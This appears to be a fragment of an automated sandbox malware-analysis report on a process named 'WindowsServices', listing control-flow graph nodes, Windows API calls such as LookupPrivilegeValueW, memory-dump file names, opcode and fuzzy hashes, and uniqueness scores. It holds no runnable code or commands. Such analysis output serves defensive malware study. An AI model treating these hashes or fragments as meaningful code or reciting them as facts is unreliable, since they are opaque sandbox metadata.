                                                                                          control_flow_graph 301 c2a6ae-c2a6d5 302 c2a6d7 301->302 303 c2a6da-c2a6e0 301->303 302->303 304 c2a6e2 303->304 305 c2a6e5-c2a6ee 303->305 304->305 306 c2a6f0-c2a6f8 LookupPrivilegeValueW 305->306 307 c2a731-c2a736 305->307 308 c2a6fe-c2a710 306->308 307->306 310 c2a712-c2a72e 308->310 311 c2a738-c2a73d 308->311 311->310
                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00C2A6F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          • Opcode ID: c8fc18f1d969b017963119454472756964a5fd5ea9d670daa30b3a20eb8aa86d
                                                                                          • Instruction ID: e97ebf01c4325759b4094a351b17289c19397ecef0eb6f4e802f85759a8a2fc5
                                                                                          • Opcode Fuzzy Hash: c8fc18f1d969b017963119454472756964a5fd5ea9d670daa30b3a20eb8aa86d
                                                                                          • Instruction Fuzzy Hash: 9611C8766002408FEB50CF25E885B56FBE8EF14720F18C4AAEC45DBB45D374E944CA72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 313 c2a5e4-c2a62c 315 c2a62e-c2a636 FindCloseChangeNotification 313->315 316 c2a66d-c2a672 313->316 318 c2a63c-c2a64e 315->318 316->315 319 c2a650-c2a66c 318->319 320 c2a674-c2a679 318->320 320->319
                                                                                          APIs
                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00C2A634
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: ChangeCloseFindNotification
                                                                                          • String ID:
                                                                                          • API String ID: 2591292051-0
                                                                                          • Opcode ID: 87cf838955edd0dfc4400c8af159e9d1006b8bc7db0f9245f0fbe7afe62186cf
                                                                                          • Instruction ID: 849301b265c123dd67785add39b30de1aaf2d6006d7d6025a863b587263550ed
                                                                                          • Opcode Fuzzy Hash: 87cf838955edd0dfc4400c8af159e9d1006b8bc7db0f9245f0fbe7afe62186cf
                                                                                          • Instruction Fuzzy Hash: 131182715053809FDB118F25DC84B56BFE4EF46620F0884AAED458F666D279A908CB61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00C2A634
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: ChangeCloseFindNotification
                                                                                          • String ID:
                                                                                          • API String ID: 2591292051-0
                                                                                          • Opcode ID: ec1633f8f4e95d0b272c22723bdd05f6b7e6239fbdbb0ff4067247572227d3b7
                                                                                          • Instruction ID: 05be1658608c996e6881ca635877857174be0da113de780224a4a7194441adc1
                                                                                          • Opcode Fuzzy Hash: ec1633f8f4e95d0b272c22723bdd05f6b7e6239fbdbb0ff4067247572227d3b7
                                                                                          • Instruction Fuzzy Hash: 3201D475900240DFDB108F16E884766FBD4DF15720F08C4AAEC058BA56D378E508CE62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00C2A9CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: ChangeCloseFindNotification
                                                                                          • String ID:
                                                                                          • API String ID: 2591292051-0
                                                                                          • Opcode ID: 80a1634b0d2d5b741abf995091b786bdff9b9b26424258a41072f0e362aa2448
                                                                                          • Instruction ID: 462b846178ce4d54297e4f8d93a2c427cb785dd34686dfb44f1266f3a1495ba2
                                                                                          • Opcode Fuzzy Hash: 80a1634b0d2d5b741abf995091b786bdff9b9b26424258a41072f0e362aa2448
                                                                                          • Instruction Fuzzy Hash: 7901D471500640CFDB50DF16E984752FBE4DF15320F18C0AADD498BA56D674E548DE62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1997560679.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_e90000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f5baaff3913166877860022e111c2840dd1897ca4db6f05dcffc0a81b30f8e27
                                                                                          • Instruction ID: ebbc05348e4aaf96a74d2d97ce55e9ee9e026015c63bd4fcc6028fabd1f13a9c
                                                                                          • Opcode Fuzzy Hash: f5baaff3913166877860022e111c2840dd1897ca4db6f05dcffc0a81b30f8e27
                                                                                          • Instruction Fuzzy Hash: 74416670215A828FC304FF3AE98178977B2EFA4209705C829D004CB26EDB34AD5DCB92
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1997560679.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_e90000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3bc73aa1f15441fd104aa7ddd8869e2a97479d05997fe8a94cd23f0e00067891
                                                                                          • Instruction ID: 1d889474f4e0430ecb9dfb5b70b79d377448f4f82e244de782c2c168e3483d03
                                                                                          • Opcode Fuzzy Hash: 3bc73aa1f15441fd104aa7ddd8869e2a97479d05997fe8a94cd23f0e00067891
                                                                                          • Instruction Fuzzy Hash: BF019A3120D3C04FC3066739A8340693B76AF8321270904EBE481EB2A3CB3D9D49D3A2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1998747994.0000000000EC0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_ec0000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d6c622811fae8ecfff13ffb43c339dcb6259aa0cbfb31c3f09299e4b04e505d2
                                                                                          • Instruction ID: 0bdcb7c06daf38f6012ba26d71ead76178ad5567150e0ee3134aa48250c5cce0
                                                                                          • Opcode Fuzzy Hash: d6c622811fae8ecfff13ffb43c339dcb6259aa0cbfb31c3f09299e4b04e505d2
                                                                                          • Instruction Fuzzy Hash: 4A018BB65097846FD7118F15AC44863FFB8DF96620709C49FEC4987652D135B908C762
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1998747994.0000000000EC0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_ec0000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5a11b9991503ab74e9b525c68afb51997ad294fb4c1a7f88cfdaa15e7d9c3972
                                                                                          • Instruction ID: efc29ad9bd51f07b1a38c8504296bf53e80c99171de3e1d7a4b412544e811f06
                                                                                          • Opcode Fuzzy Hash: 5a11b9991503ab74e9b525c68afb51997ad294fb4c1a7f88cfdaa15e7d9c3972
                                                                                          • Instruction Fuzzy Hash: 39E092B6A006449BD750CF0AEC81452F7D8EF98630708C07FDC0D8B711E639B508CAA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994461805.0000000000C22000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C22000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c22000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 624ff1968e03e46a45be5b427a9c4e1d1d4853d08cad7bbd1115afc2af6ecdf8
                                                                                          • Instruction ID: eb1f576f1bdee1beb62f1f55b7c756dd465aebbe84990e3a5410ca7053dc74bc
                                                                                          • Opcode Fuzzy Hash: 624ff1968e03e46a45be5b427a9c4e1d1d4853d08cad7bbd1115afc2af6ecdf8
                                                                                          • Instruction Fuzzy Hash: 5CD02E392006D04FD316AE0CE2A8B8537D4BB40708F0A00FAAC008BB63C768DAC4E600
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994461805.0000000000C22000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C22000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c22000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 729b51da621bb1abc408eb9b3ce424c235411342cb8abc8ef0e9710b7138d4c3
                                                                                          • Instruction ID: 339ab92e0bdc8a1a11b113c22f974221d6cb404c223b272f42ca969e02bc643d
                                                                                          • Opcode Fuzzy Hash: 729b51da621bb1abc408eb9b3ce424c235411342cb8abc8ef0e9710b7138d4c3
                                                                                          • Instruction Fuzzy Hash: 07D05E383406814BC719DE0CE2D4F5937D8AF40B15F0644E8AC208BB72C7A8DAC4CA00
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1997560679.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_e90000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7eb83502392bb73ed2c0693a92dc81ffa8f06f86a4d5f257149493821585acf5
                                                                                          • Instruction ID: ca1abe0d4549383cfc02aef4490e3daaa7fa1d6f8a7b4c4334991be60bead011
                                                                                          • Opcode Fuzzy Hash: 7eb83502392bb73ed2c0693a92dc81ffa8f06f86a4d5f257149493821585acf5
                                                                                          • Instruction Fuzzy Hash:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%